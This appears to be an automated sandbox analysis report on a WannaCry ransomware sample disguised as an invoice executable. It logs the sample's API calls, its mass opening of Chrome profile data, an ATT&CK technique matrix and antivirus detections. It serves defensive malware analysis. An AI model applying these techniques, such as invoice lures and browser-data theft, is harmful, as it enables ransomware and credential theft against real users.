            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD72BC0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,86_2_6CD72BC0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10004F20 swprintf,swprintf,MultiByteToWideChar,CopyFileW,CopyFileW,GetUserNameW,_wcsicmp,KiUserCallbackDispatcher,swprintf,CopyFileW,10_2_10004F20
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

            Stealing of Sensitive Information

            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\~SD951B.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\~SD94CC.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\~SD94C6.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\~SD94A0.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome\~SD94FF.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\~SD94D1.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\~SD1F44.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\~SD9501.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\~SD94D0.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable\~SD950A.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\~SD1F32.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\~SD1F2C.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\~SD1F2F.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\~SD94B0.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\~SD94CD.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome\~SD9503.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\~SD94A8.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable\~SD9502.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\~SD1F2B.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\~SD948D.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\~SD948F.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\~SD94E8.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\~SD94AA.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\~SD94C3.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\~SD94C4.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\~SD94AF.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\~SD94A2.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir\~SD94C9.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\~SD94C1.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome\~SD951A.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\a7dd23ff-bd8a-4774-b81c-93fccb341274\~SD1F2A.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\~SD1F33.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\~SD9520.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable\~SD9506.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\~SD1F45.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\~SD94E6.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\~SD94FC.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\~SD1F30.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\~SD94E2.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\~SD94A7.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\~SD94EA.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\~SD9508.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\~SD94A1.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\~SD94A3.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\~SD1F2E.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome\~SD951E.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable\~SD951D.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\~SD9500.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\~SD94C5.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\~SD1F34.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\~SD94E5.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\~SD94E9.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\~SD94FB.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome\~SD9507.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\~SD1F4A.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\~SD1F31.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\~SD94CA.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\~SD1F47.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\~SD94E7.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\~SD94E3.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SD948E.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\~SD94E4.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\~SD1F2D.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable\~SD94FE.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\~SD94C7.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\~SD9509.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\~SD94C8.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\~SD94AC.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\~SD94AB.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\~SD1F49.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\~SD9505.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\~SD951C.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\~SD94CF.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\~SD94AE.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\~SD1F48.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\~SD94FD.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\~SD94A9.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir\~SD94CB.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\~SD94A6.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\~SD1F29.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\~SD1F28.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\~SD94C2.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\~SD1F27.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\~SD1F46.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\~SD94CE.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\~SD94A5.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\~SD94A4.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\~SD94AD.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\~SD9504.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\~SD94C0.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\~SD951F.tmp
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEC2C90 ENGINE_add_conf_module,CONF_module_add,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,ENGINE_get_ex_data,ERR_put_error,ENGINE_get_ex_new_index,CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,sk_new_null,CRYPTO_lock,ENGINE_get_ex_data,CRYPTO_lock,sk_free,CRYPTO_free,ERR_put_error,DSO_new,sk_num,sk_value,DSO_merge,DSO_load,CRYPTO_free,ERR_put_error,DSO_free,CRYPTO_free,BUF_strdup,CRYPTO_free,BUF_strdup,ERR_put_error,CRYPTO_free,CRYPTO_free,DSO_load,DSO_bind_func,DSO_bind_func,ENGINE_get_static_state,ERR_get_implementation,CRYPTO_get_ex_data_implementation,CRYPTO_get_mem_functions,CRYPTO_get_locking_callback,CRYPTO_get_add_lock_callback,CRYPTO_get_dynlock_create_callback,CRYPTO_get_dynlock_lock_callback,CRYPTO_get_dynlock_destroy_callback,ENGINE_add,ERR_put_error,BUF_strdup,sk_insert,DSO_convert_filename,ENGINE_set_ex_data,CRYPTO_lock,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,DSO_free,ERR_put_error,DSO_free,ERR_put_error,ERR_put_error,CRYPTO_free,ERR_clear_error,DSO_free,ERR_put_error,__stack_chk_fail,__stack_chk_fail,ENGINE_load_dynamic,ENGINE_new,ENGINE_set_id,ENGINE_set_name,ENGINE_free,86_2_6CEC2C90
            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance
            Valid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            12
            Scripting
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services12
            Archive Collected Data
            Exfiltration Over Other Network Medium22
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization21
            Data Encrypted for Impact
            Acquire InfrastructureGather Victim Identity Information
            Default Accounts12
            Scripting
            1
            Browser Extensions
            11
            Process Injection
            2
            Obfuscated Files or Information
            LSASS Memory1
            Account Discovery
            Remote Desktop Protocol1
            Browser Session Hijacking
            Exfiltration Over Bluetooth2
            Multi-hop Proxy
            SIM Card SwapObtain Device Cloud Backups1
            Inhibit System Recovery
            DomainsCredentials
            Domain Accounts2
            Native API
            1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            Security Account Manager3
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            Automated Exfiltration1
            Application Layer Protocol
            Data Encrypted for ImpactDNS ServerEmail Addresses
            Local Accounts12
            Command and Scripting Interpreter
            1
            Services File Permissions Weakness
            1
            Services File Permissions Weakness
            1
            File Deletion
            NTDS16
            System Information Discovery
            Distributed Component Object ModelInput CaptureTraffic Duplication2
            Proxy
            Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
            Masquerading
            LSA Secrets221
            Security Software Discovery
            SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Modify Registry
            Cached Domain Credentials11
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Virtualization/Sandbox Evasion
            DCSync2
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
            Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
            Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Hidden Files and Directories
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
            Supply Chain CompromisePowerShellCronCron1
            Services File Permissions Weakness
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
            Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Rundll32
            Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
            [Behavior graph. ID: 1375296; Sample: Request for Quotation (RFQ_...; Start date: 16/01/2024; Architecture: WINDOWS; Score: 100]

            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnk | 100% | Avira | LNK/Runner.VPDJ |
            C:\Users\user\Desktop\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry |
            C:\Users\user\Desktop\@WanaDecryptor@.exe | 90% | Virustotal | | Browse
            C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | 92% | ReversingLabs | Win32.Ransomware.WannaCry |
            C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe | 94% | Virustotal | | Browse
            C:\Users\user\Desktop\TaskData\Tor\libeay32.dll | 0% | ReversingLabs | |
            C:\Users\user\Desktop\TaskData\Tor\libeay32.dll | 0% | Virustotal | | Browse
            C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll | 0% | ReversingLabs | |
            C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll | 0% | Virustotal | | Browse
            C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll | 0% | ReversingLabs | |
            C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll | 0% | Virustotal | | Browse
            C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll | 0% | ReversingLabs | |
            C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll | 0% | Virustotal | | Browse
            C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll | 0% | ReversingLabs | |
            C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll | 0% | Virustotal | | Browse
            C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll | 0% | ReversingLabs | |
            C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll | 0% | Virustotal | | Browse
            C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll | 0% | ReversingLabs | |
            C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll | 0% | Virustotal | | Browse
            C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe | 0% | ReversingLabs | |
            C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe | 0% | Virustotal | | Browse
            C:\Users\user\Desktop\TaskData\Tor\tor.exe | 0% | ReversingLabs | |
